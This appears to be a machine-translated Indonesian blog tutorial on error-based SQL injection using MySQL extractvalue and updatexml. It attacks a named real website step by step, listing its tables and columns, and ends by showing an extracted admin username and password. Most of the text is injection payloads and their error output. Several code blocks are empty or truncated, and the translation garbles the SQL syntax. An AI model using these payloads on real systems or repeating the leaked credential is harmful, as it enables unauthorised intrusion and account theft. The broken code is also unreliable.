Jadi
tutorial Injeksi XPath beberapa telah mendapatkan diposting, dan karena
saya belum melihat banyak info tentang metode updatexml, aku pikir aku
akan membuat tutorial singkat untuk itu. Saya ingin berterima kasih 6Dan untuk ide. Sekarang saya akan pergi atas kedua metode hanya demi menambahkannya ke mega-thread saya.
Ekstrak Nilai
Aku akan menggunakan situs ini sebagai contoh.
Code:http://leadacidbatteryinfo.org/newsdetail.php?id=51
Versi (ExtractValue)
Code:+ + Dan extractvalue (rand (), concat (0x7e, version ())) -
Ini akan mengembalikan Kesalahan sintaks XPath kami, dan memberi kita versi kita.Ini adalah apa yang tampak seperti link saya.
Code:http://www.leadacidbatteryinfo.org/newsd...sion ())) -
Code:Kesalahan sintaks XPath: '~ 5.1.52-log'
Anda harus mendapatkan versi Anda.
Mendapatkan Tabel (Ekstrak Nilai)
Code:
Link saya terlihat seperti ini.
Code:http://www.leadacidbatteryinfo.org/newsd...t+0, 1))) -
Jadi mari beban itu dan melihat apakah kita mendapatkan nama tabel pertama kami!
Code:Kesalahan sintaks XPath: '~ pdigclicks'
Woot itu berhasil! Sekarang kami hanya selisih dalam pernyataan batas kami sampai kami menemukan meja kami kami ingin kolom dari.
Code:http://www.leadacidbatteryinfo.org/newsd...e () + limit +1,1))) -
Code:Kesalahan sintaks XPath: '~ pdigengine'
-. -
Kami ingin pengguna atau admin ..
Code:http://www.leadacidbatteryinfo.org/newsd...e () + limit +2,1))) -
Code:Kesalahan sintaks XPath: '~ pdigexcludes'
Code:http://www.leadacidbatteryinfo.org/newsd...e () + limit +10,1))) -
Code:Kesalahan sintaks XPath: '~ tbladmin'
Woot, sekarang mari kita kolom.
Mendapatkan Kolom (ExtractValue)
Pertama, kita ingin mengubah nama tabel kami ke hex.Anda dapat melakukannya di siniNama tabel saya adalah tbladmin.
Setiap kali Anda mengubah sesuatu ke hex, Anda menambahkan 0x di depannya.Ini memberitahu situs untuk membaca nilai hex.
Hex dari tbladmin adalah 74626c61646d696eJadi seharusnya terlihat seperti ini.
Code:0x74626c61646d696e
Sekarang untuk mendapatkan kolom kita, kita mengubah sintaks kami sedikit, tapi masih umumnya ide yang sama.
Code:
Tentu saja, ganti TABLE_HEX dengan nilai hex nama meja Anda.
Link saya terlihat seperti ini.
Code:http://www.leadacidbatteryinfo.org/newsd...t+0, 1))) -
Code:Kesalahan sintaks XPath: '~ adminid'
Sekarang gunakan kenaikan dalam pernyataan batas Anda sampai Anda menemukan kolom yang Anda inginkan.
Mendapatkan Data Dari Kolom (ExtractValue)
Sekarang bahwa Anda punya nama kolom Anda, Anda akan ingin menempatkan mereka dalam sebuah pernyataan concat.
Code:
Kolom saya inginkan adalah username dan password, 0x7e adalah nilai hex "~" yang akan saya gunakan sebagai seperator a.
Link saya terlihat seperti ini.
Code:http://www.leadacidbatteryinfo.org/newsd...t+0, 1))) -
Dan seperti yang Anda lihat, kita mendapatkan error XPath kami dengan login admin.
Code:Kesalahan sintaks XPath: '~ ~ ishir ishir123'
UpdateXML
Mendapatkan Versi (UpdateXML)
Code:+ + Dan updatexml (0x7e, concat (0x7e, (versi ())), 0) -
Link saya terlihat seperti ini ..
Code:leadacidbatteryinfo.org / newsdetail.php id = 52 + dan + updatexml (0x7e, concat (0x7e, (versi ())), 0)? -
Kami mendapatkan kita Kesalahan XPath yang mengembalikan versi.
Code:Kesalahan sintaks XPath: '~ 5.1.52-log'
Mendapatkan Tabel (UpdateXML)
Code:
Link saya terlihat seperti ini ..
Code:http://www.leadacidbatteryinfo.org/newsd ..., 1))), 0) -
Code:Kesalahan sintaks XPath: '~ pdigclicks'
Sekarang kita tahu tabel pertama kami disebut pdigclicks. Mari kita lihat apa lagi yang di sini ....
Code:http://www.leadacidbatteryinfo.org/newsd ..., 1))), 0) -
Code:Kesalahan sintaks XPath: '~ pdigengine'
Demi waktu, saya tahu nama tabel saya inginkan adalah tbladmin.
Code:
Dan ada meja kami.
Code:Kesalahan sintaks XPath: '~ tbladmin'
Sekarang mari kita kolom dari tabel.
Mendapatkan Kolom (UpdateXML)
Sekarang ide yang sama, kita hanya mengubah tabel untuk kolom, dari nama tabel.
Code:
Sekarang nama tabel saya tbladmin, jadi saya mengkonversi ke hex dan 74626c61646d696e
Link saya terlihat seperti ini.
Code:http://www.leadacidbatteryinfo.org/newsd...1))), 0) -
Code:Kesalahan sintaks XPath: '~ adminid'
Mendapatkan Data (UpdateXML)
Sekarang setelah Anda punya kolom Anda, menyatukan mereka dan mendapatkan dari tabel yang Anda inginkan.
Code:
Link saya terlihat seperti ini ..
Code:http://www.leadacidbatteryinfo.org/newsd ..., 1))), 0) -
Code:Kesalahan sintaks XPath: '~ ~ ishir ishir123'
0 comments:
Post a Comment